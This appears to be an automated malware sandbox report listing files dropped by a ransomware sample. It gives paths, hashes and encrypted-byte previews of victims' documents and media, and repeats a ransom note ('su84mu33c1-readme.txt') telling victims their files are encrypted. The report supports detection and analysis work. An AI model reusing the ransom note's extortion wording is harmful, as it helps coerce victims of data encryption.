          Preview: <.=.D.d|I.iFv.....H..V./.o...._2..]5...F....M.|T...1..H#3.ZB.......h.3.....M./.+h......`<R....<.A... .G~. .4..3a.R..j.......5Mb..?o8z..(.Z.4...,....k'.T.=.8|..(=.7nJd..U.'.u.).~8.p...YY..5'.7._.%M..[...:6.. *...a....D..3Z.[.E.Z..b......-C.o.i..}...L..uf*.X.>M.q%f.#..F...lS...ja|..@...R..g.+..;..v<.P....i...i2d..........w......>.9H,}.v......J....o..(.......-..U.F. !......._g.J....Q.....H..bc...H..R(e.R...*....d.-+=....[.2_. ...7\.8O+...Y...Y.).[n.t...LlE.....]...a.n.8A.m:...5...<j.._.J.A.i...?...p.B..1.._<v.#....../..`.r.hdv#.9j.vF....dY...M...Do:..Q.A42..a..1......G...2Q.Tv........I......(...Tn.|.S.r..Y.......C.c........w...w...)D.H..I(...a.....+.E...M.s..'Q...y'I..o. .>W.".N-;.Fx5.D...G...o*.^.<..<.<......N.\......x8..&.QP.. \...g..P....& k^m.../.W.0G[]..{......e~.<.....lta..g....Y...K.{7.......H..*.!...?...F&......G."];.T<..M.ob..B..$7......UV.g.i_*G...T.,...L...1.`e.=.v4..f^.....L.=....../.fV.C.....!..5....'K.0>...3..c8.
          C:\Users\user\Desktop\FENIVHOIKN\FENIVHOIKN.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.85234148339743
          Encrypted:false
          SSDEEP:24:shQRaJmnvx3Ltg0SCJ3+7982HQqFeOKn9lKCXHOL7NkPA9O8ZksGFsPZ5whXADnD:shSJHB29CqF0fJO3GP75bsYlu+6
          MD5:18078FE691E9169514338BF71EC7E4B4
          SHA1:9098E5D6AAE72356B7C996A9685AA666BF4D21BD
          SHA-256:5F9CDBE4402A50947A5AAAFCDBB84F493D386C6530DC9E13002F4FE2F6735B0E
          SHA-512:DE07845738CFC33DD8B300F780E0E7FA3E5850496C4B95B3EA520EF8CA75D9F8E4C69F5D28B84860788771BDEF7FAF8514B70EDDE60215A049F5F35E6D8E3CE1
          Malicious:false
          Preview: .Wf%..r...q.}...\....q....*._..P..&.$..L.....g.<../7.%.do....A8...v..7f.dt...K..YP..7...]V..h..s....vFs...G.70:...`..%..x. .....${..P......xd..B[......w(-6...... .....J"..@...T..U...G.G...f..W}..+/..1......yvU.{...;r*..P2.A.....K.E..3..L.C1o..}3.6b...`.{&..]1...C....#.c.!..\K3PuyQ"...:P[t\.(.n..N.?....{..5B............R._.:%.q.F9..9 .......M.......xc%.......W.....V...0.W\.1....'...!%l...[...Ay...`.L+....ER..%kT...O-.jc/.$....t.S....b..+..T....Q...W...~GjQr.1,..]'......^.E...~...S:.<E.fi.>.dy.".8.i2....,.Q....;7...CJ.;....e.0B...lp..........#.Iw.l.X......e.j=5N!.m.R...G...}l..@.......*..H.$D..."...d).v.x...E.-+.7I.]....q:x[.....'.4...yXv.)...^."V.......qG].y..........P.....w5...IT..VX.h..p....U..%...R...]..w!s.).G.............@p]M.nJ.........(....$J!..,...Q2.}.l.....kc-..c..A..'.U&..b&m@Y...6..V*.W.bg........2.Onu2M|j.R.y.i.3Z...`...8a.....q1'..C/.q5....Q.U.F......t.<R..oi.....{.n...Gm......../.r.1y.])oU.a.Hp..tNX8}.J.U....1....J.f..'`,
          C:\Users\user\Desktop\FENIVHOIKN\SQRKHNBNYN.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.840121481125133
          Encrypted:false
          SSDEEP:24:ZtQZlpuJb53oNwWNe/4RbX+WEhHWjCFBmY8Q+C2qaBGbYZoyZr9faDrxavTyVvT+:ZtQxuJb53YwWMARD+WSBmYurZoyZd2r4
          MD5:3B8B464C4634EC856CA99CCA70AD54DF
          SHA1:EFEC8C546092B8B67DDA1875CB31A0CCA07C6823
          SHA-256:16BB854D772AF4FB6A4FC17696308B788D27C29E85AB9A1F3771A5CA768A683F
          SHA-512:8BB914E63AB0501753E9168BFDE4861E6B8F0ACD3D6C38BC65E593CE2A935B532268053614E8DC37C0DB87BC20643F071CAC737E536AA90515EC33F66CB6EA0B
          Malicious:false
          Preview: Q.yW.US#K`...(....w..[2......u.......O....yo.;.~..B.V1...R.A.c.........)E#...Qk.q.........(.o.{.....Xm...-......}..oj..].?.....4g3.9..s.ZO..`.v.6.)....s.~.....\....E....E....(G.0*. 1.aj..Du....|......`...."..mv..F7.(.k...w..p+....=...tW....hZ........A.]."kCS8.FH0.*....,R..!......s...:..*g..~.L...=....y..n....A..Zu2....=..BYF\@.....}_.iPjO.'.Hf.........t[J.[{Rj=|.UR.l'..+..............v4...z*v+&.D#.|..Zn"5..j:.D....E4.....<.........nHn..4..w.`|4.t..H4.Q/..72g..l..x.[.g..;.q.m....m.I5.G..j....V....)u.E.9c.....K.)3D.].=...m..;...rM.<....}N..>...h[.\$-...r.....+.W.4O.1.*&Q..O5r.j.L.-.n+.:(.c...Y..,.*.qb.f.h...D.P.V..G.\.P.(;...M.e.S.6zP....]..4..SD..=..._..S.D)...u.....#.^g.Q..x....y.M..cu).x. .o.+..v./.....,.{R...8...;.....odfQ.Vw...q.?(>.;.....<$.y.5.WK..i.....?;&.....R.Nrr.+...1..W...hoM9Q.W..g,.1....?.Q......>Y..ey....BF...7../.r......b.S...6.;.E.#..5|..O+..)F....K..bqy^.H.*'U{...F'.D...x..+..t>.*..v.}=U./.{|....5'.A....h...TJ....Z...km.;
          C:\Users\user\Desktop\FENIVHOIKN\VAMYDFPUND.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.838923952720435
          Encrypted:false
          SSDEEP:24:yB6j1HLcQgQr5Ch/ZtsavtNYMSoXR3vKSeGbW8zgz4f0kMJBeN9XADn+z+06n:yOebtZTzR/0G5kzqzMKHu+K06n
          MD5:1CE81665EA6324F29A3C96DB34E7349D
          SHA1:5371CB9867DAAB95E09A814ECA833708270A6333
          SHA-256:73A56EB4620A9E96CA313BD42CB3495FDEAF44FB4A1410F26D38767628713CF0
          SHA-512:BAEC8F9C5F6186473EDEB3B6599609E5F3AEC6FFC8466BE12518D0B5B0EFFA4A8EE6EBAFA2BA415E34420C07B06B7F4CA40BA1460048C530520EAF7138B67D6D
          Malicious:false
          Preview: J...V..?.m......I:...`*.^..o...x..7`....E.{...1....~..H...&....H`s...%T.......M...lA..5.. .c.j.gQ.<.!s... ...p.J...T$..wT..vl`A...1W=6L.......:.h.....Bi.....6G{^c.].-..:...HC9..R............k..X..u..{..G.R.......a|.Y.\..&.~.D!p..'..G.O...c.a..i.&.l)....|.@.gI.{x..`.y.L...~%..fM......Q~..l..zA.....j.m..6_...m..Tllb.@<.Y......].^.C..0.'....rl.)4.XMy.u..I>...8.t..%.:L..M.....Bd5p|.*..%U.3,.N7....?,..b...n..\......"~.e.].Yf.jv....F8...w.r!....'.7..M.u..py......6..)...HB.e0.........N....[.H..I)`$a...Q.........G..K..3..3@.AK..PR"d.{..Z..J^.0.)[../..)`k.g.R..-..........z.V....._R?.ik.F`.!....lb.{.c......Q6.m2..MkC.......<>kQ,B&..2K/^p.Mp5Z... .$..m...so...B...IZK$.b..I`hp...R..4gT.Ok....r....3...3 ..}..LI.....y.....!wx._e..................)g......AP.(..0*gd.2.!S...._...z.....^..e0......E./7....(.I>M%I ........ ....L..%n..w.......v.T.T..:,4/.l~."G.;....d+....H.b..j.Z*..1q=0|.w.R/.].}k..k.7.%O.|[......=$_..k..Nzsa.....g.fK..x..m.?y.2.wW.
          C:\Users\user\Desktop\FENIVHOIKN\WKXEWIOTXI.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.852058669848622
          Encrypted:false
          SSDEEP:24:QU6hIVdQFRiAWvHyKvugYUPc6Y/5jcoZfS6fXADn+zZ1:5NV6iAWvHn2xUPc6q5j7ZRfu+T
          MD5:763A5EB82623A416DD9652E4492939C2
          SHA1:E63511C903086273AE8BA6C8F4753A0DAE984680
          SHA-256:801DFDFAD354C8B923582E47A3067C60BEE3667B1EC9227D6DF40C69F13BD3A9
          SHA-512:E31D81FFC01976099EB08761B169230E2079229611BB6171F1BDE7D4519C1FC678B21AB8249110C674DC2402156A4BA91B55275ABD2B9811E9B432388BEAC69D
          Malicious:false
          Preview: .l].........4..4...IM.WK..b..0....q.z]3.VtP..X..C4](...k....V..~....*.,.3.=.......X#....Al......%D...Mi*!<^.$.n....UW-..*;F.I81j..`a.=b.,..4.....wPN......V0.a...,@4...........1.!..$.1}............B/..*a.6..\.#..*:*.]E*...S.....G@.T.A}....ou..|NJ..0.u..X~.;.5P...."...OF..b...]|...&..p.;T..L...........X.... T.o..+..z..4x.?'8.C..o...2......t.....FpTB.E.w.He......v.0.R.s.@..G......j.D.~.>.6x.....EbZ...gy....W..O..>..x...]Y..#..anfp..xb...s/.z.k.K6.V>,.(.l.TBUk..59x./.Mz..I.5....IX....c..>...Q.O6,...T....._.hi3....M..p. /...=.1s.O.`..'}.....M........@......5....9D..s.3....u...K...X?/..:.k...EK9.. ...2....'..zl.-.E.......J. .V.\..g.M.}\Q......y.....+N..z.h.kK.i...7,....Q.^.."..8.G.2.\..k.\H..g..A.h.G.Q...:.@.......u.*,..$.08.."m9P...#....U....p..A..DY.<.n..: ..4..4U9.!.....r.t..F...^.....B/j..G.#0s..y.q..2G. .X..4 ...Z...:.....X.c.......'..Y..0.:i..y.&{5..w/0K.2@qh.!.#Gyb..G..JZN....#..M...^.O...Y.J..n.......&..l.+H.^.{.].#{.c..$.s.5.A]Co5'.f...
          C:\Users\user\Desktop\FENIVHOIKN\ZTGJILHXQB.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.832268435127478
          Encrypted:false
          SSDEEP:24:ykc7X770XplZpSSv6GIyLUCrUXGVKZxOaozXADn+zCZK:yksX7MplttIyYrGVKZHUu+eg
          MD5:BE1B43067B4638785713A9A4BA436001
          SHA1:1AE32D3D4EEE8183C878F4E868BF73832DF073E5
          SHA-256:9C64D996F4E58208F146D85B5969565E020893D74EDDE108ACAF32501A2FA067
          SHA-512:BF1893F7F881AA93C5A6AD9CFB700EAFD942F9529A6B5739ECEF8844BB81BD56EACFA4C8ABC0DB2BC38E2F907EB2CAD1EEF9FBF6D9522E02C8CC03865FFCCEC2
          Malicious:false
          Preview: 4.#x..m.E....r.l......|+l....[.)V2zY...%J\....d.A..Z...h.K.9:.J...O..".Lb...V.'..W.fE.s../...G...n.@..9l'.....P....`.*.,..0.v.....G..}....4b.=$..PrA..[...?....<S...]s...C.o....j.......1.3V.7......7....{.m....7]..[...{d^XB.Q)r...)...FLt%,.U....w...c.....lL..`\......{W9.]....&........2x..7..Y............NW.%.w...5..z.'`-..c...<..|/..l..Zl.1...gI.7.D/nN.n....+H.B.~.\g548...r^........%.d...!..'%%.l..k.....cT.{"..1.<.Z %C..M..$.....G.*.C.-9R.B.1r.X....<.A;..D.9..]...<u..c.a!m...%l.z%..D.^..q......e.Jk.k|. .! .!{<.4..+ib...o)..M....<oX...#.{3;...Q.f.V.B......rK....8../.T.>|."O...-.C....M.s?..C....E..S=B..]...Da..H._$/R.z....:..Bo...0.-.. ......%.?...k>..`..mSa?..D.e.O..Ds.M..3..q;.y.cD...jzm.H..z\.U....Zc..L.]+{.........../...}89T.|{C).5..^Y.O..S.Dp........ef........'/.n.V#x7.E@G..;..?.......W9.m.)v.(...0.e-.T......uu.W8..Q.......Q..!#.F[.Q..5..^.H\O^......'.rDc1..%P$...pS.L...x...]:...d....V.;.8...P.w;n...p`..nKZ7.G1.U..0V..C\.j..@..t4....iD
          C:\Users\user\Desktop\FENIVHOIKN\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\GIGIYTFFYT\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\GRXZDKKVDB.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839986346856209
          Encrypted:false
          SSDEEP:24:C68BynI5WCAZoqq6C4K8u51A+//9JiZhiD+bh8svDcxMMXADn+zxVyQu:KgTZoR6CCy1AAshM+bh8svQMcu+U
          MD5:798F28CBAD7987AA41ECFDE3144A3215
          SHA1:FD250AE6BA5DDF6D3316D7071C1317C425318D41
          SHA-256:E00FB8553CE588711C7D1771F8765667EE24FA2DD424B482FAE7797DD6BFA406
          SHA-512:B97D5911DD903B48F1348EE5EF1D4B85A035810755905173A9963E6CA2AD2A1CB10D44278B2E1075AAC50DA7E9BBEC6650EFE2DC0D0C1E19723B6D2FD32AD56B
          Malicious:false
          Preview: U.s.*+....1.{....+.4....3.6...J[{.%...=H.-...:.....PR...m..o......u]../qh....;..l..4VW)....yXx...2..c.)....9b,..3_K.0.u5.[..:@...?.y1...`.V.....,f_].W..k\.D."..Z.8l...@.v_B.'..<.....wi...H....j=.C[.N+2o.5....BAk.$...Sgw.o.gw..:.......L....P......"..._q3...y].,..'""..=|.-.b...=!...=G.......M.MW-.C....L9.gR.X..O.p.....>H^...dX..2........jX_('..p...-..vs...;Ck.#.....g...I.O2.zF..#...qf...P#F&.W6....\.rf.[m.w........I....\(-....L)$.....1.....I..)...a..^..`..h..j..........E...g.e`~.&.F....5(..d{.[.....YlE...m..X>.;G....h...Q.y..I..B..@......./e..-8<.=.._...1\.p.e....X...p5..@.Ts<....Z..H.....=..y.6..a.._.+.1!..H..(....s.....*ZS.xo ....)j.oQ;[.%[s.d..Of.L...`B.;w......*w..r..KVm.,...I.l..5L..l..En)...j4.`k.'(..*..3>r...o..!8......A.}o+.....f...?o.N.ag.....`Dh..<VX)..c...W%.x.`...+r.k.."....q.-&.,.....=.v".....V..)..r.}.d`..Q.f.ybC........r?.n....s..r......@..Z..M..<$.|.PA{.7w....5[Z..q.le.>$H.....)]....g.H6e.Y.<v.T.......T....".w.8.
          C:\Users\user\Desktop\GRXZDKKVDB\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\IPKGELNTQY.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844964817865042
          Encrypted:false
          SSDEEP:24:Ix9BJTc9kvgPbNlTmXBNfFUGk2ib5gGbB+u2XADn+zkyQ:IxLBako5l6XBtFK24bBwu+AH
          MD5:3623899307A1093E87BF0BB7A4B53A55
          SHA1:9AF384BA4A2714E746DBBA6BD8C62B6932B1EA85
          SHA-256:A6B4F8231E0535085F7C9514279082064F6D38AA66C8BFCCA3990FF7968DD7DC
          SHA-512:07D1D52F715724AF3BEF3249901D1BD545910BD0287CFFE34432E939637EA4B3725F66CC43D6FFAD1633318D8072648FBC745513EEB3823A40EEB5590ABDC80A
          Malicious:false
          Preview: ... .r0....C.u..=.....}.......a........m.*.h.Gk../.`F.S.UMD.@-.H...Z]\?Hv.nB...MC...L..WV..E.B.........kB.]$.....2X%........ *....;....2)....O....."...3N..9A].....S."_Jz..@W_'1Y.:&.%...X.{.....U...X..(.....U1...#...r"-3..i.weN..KV..1....t..=......Um-....|.....[t....A..N...p.....T....:0.d>.j;.. E....%..2.n...I.......H.~IG....qx.ty..l.;....MD..... .xf.......v\..t.W.. ......&.#]........B|>..."&.f....x...m.. ....V..PS.]...m.P..3..-d.....I..7&.u.*.2 ....O".yy..T.%`.9.o...c..P..e.Qucn@.w$..]2...>I.2.X..r..#...~a...(./>.`.y..M...M...."...W..g..H.-s}.....>.7.m.q.....Ns.?y..#2.'.cY..~LD.~..!.j@.O....o.By...:~.v.i.y.....A..<E.....E;.F.._5T.T..vl.. ..ee.k.rn\.\...)][!>.=...t.\...h.\...[..(.v.<}2.w...bu...vO....0.l.!.&.....}z.T.6"j.._#6..f....`Y....UC...P.n.fd...._......;AI.x...........AILm<~G...M.7...@.j.G.q.........a..l+.x..".v..7.P....f......'.....L(=.B..q..A}.......@..C.....`r..!'..7...4....`..ZA..jC.f}G:@....q..\,..f.x....... G+u+..:..{.vi=. .......
          C:\Users\user\Desktop\MXPXCVPDVN\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\NEBFQQYWPS.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844193018773982
          Encrypted:false
          SSDEEP:24:2rZ+RffmzdCn2qz4scTi5ywNCv60XrIe0pvDkTgOBJSJXADn+zMO1Y:ko4Cn29scW5ZCXrzZZeu+r1Y
          MD5:0C8A4BED8065D32B14E49B2ADE05E778
          SHA1:5C205464F50A52FE0A52D98707DD5DAA182BF7DA
          SHA-256:4C08266ECBC4B829A812827E00A334F1DB0A92F134B0BEB4300218F184EF2608
          SHA-512:1FDF724A263C7BAB1B2AFD0DFECD9EF742A2269459037A80F0552B1F3D4FFAED7398CED8E2CDE79AC8194923BB851D6F0D9A2D2DD7A6509CC02D5E86C2B931AE
          Malicious:false
          Preview: .......bh.@..9^7d...H..#.2../F.\e.S....w...T..V4..&t..lje.{.e}y0.o..h./.VD.<.fh.&x.=.... 4..s.S..|.K.Jx.r..x.x......G...4....]...&..* ....fS.^..y=......M....`.......F.....|..O@OE{.D8-...U. .v.v...iW.(....1.......g.ss@.....g.a..b.Z[.(.....~g.u....e9I*dU.J.P.j.A{.n..Ig......e.......a...5?......,U.e.W<c.....Zq.....P".....V .&y.L..0.D.&m..^.^X.n>..@6....5.......;.]...zb.....+.&...cQ..R..6.4)>....?5...&N=..U.[l*....f...a....Q*S..0.....T...]K.!9V.......e...pnn...-x.{...n.m..T...M;.....YI0....*.W..Pm.K...4e.r.*...L3.&vV-.CY......p.t$..>...A]:u.->...e...a....<.%B.:...1z.,...dM.!....M=.S............t....W....2.....\..Y..^U!....I-...6....../}...xt..(s.!y...k?.i.. 2`..j.....F..NS..6&......w.+V....9ld......p.e(..gP.?".b..!.tdeP..........sg..Q.([.=aR.8t..G.P........m.Nm(.d?..a..R.......`{......-v..Z..nl...H..*@.j[g..B.?...e.zx<.].M.n...O#.9..}.x..v.[....mS.~zL.-..;.aXm.|...w.+...=.../zd...yL....=.I...m9[....-..sE0...s.O..i......H\...j..R.$.@...U.d..C....
          C:\Users\user\Desktop\PIVFAGEAAV.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.852919673243158
          Encrypted:false
          SSDEEP:24:pnp0Uc13OQatCpvBicW/fRcNxMHK7jn+iCe24wZ4XNQ5H2MEu2pXADn+zpp:pn+UtAl6Rc3njtVmq25WME1u+j
          MD5:F5F483D940962927282A44C18AAD30A9
          SHA1:006AA6D47AFC2C3CE1A3D1CC1E6AFBA47516C756
          SHA-256:B24427FA9126E49039C3D014EF968C180D74A316D051ABBE24D5D914CABD5739
          SHA-512:8F905B13E7B2E28648F9988DF10135150423D095A9CD1CB71E503960FE514874792CD6E0F4A052868D4F59901ADF103532CE4E7CCD5118BAB725CEBBE6065324
          Malicious:false
